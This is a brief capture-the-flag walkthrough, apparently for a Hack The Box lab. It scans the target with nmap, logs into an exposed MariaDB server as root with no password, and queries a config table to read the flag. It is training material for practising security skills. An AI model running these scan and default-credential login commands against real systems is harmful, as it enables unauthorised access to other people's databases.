Firstly, let's do a port scan. Exchange ip with the machines IP address!
sudo nmap -sV -sC -v
After a while, this is the relevant output:
PORT STATE SERVICE VERSION 3306/tcp open mysql? | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
Since the default user for MariaDB is root, we will try to log in:
mysql -h ip -u root
Then, let's search for the flag!
SHOW databases; USE htb; SHOW tables; SELECT * FROM config;
We can see at id 5 with the name "flag", there is the flag string!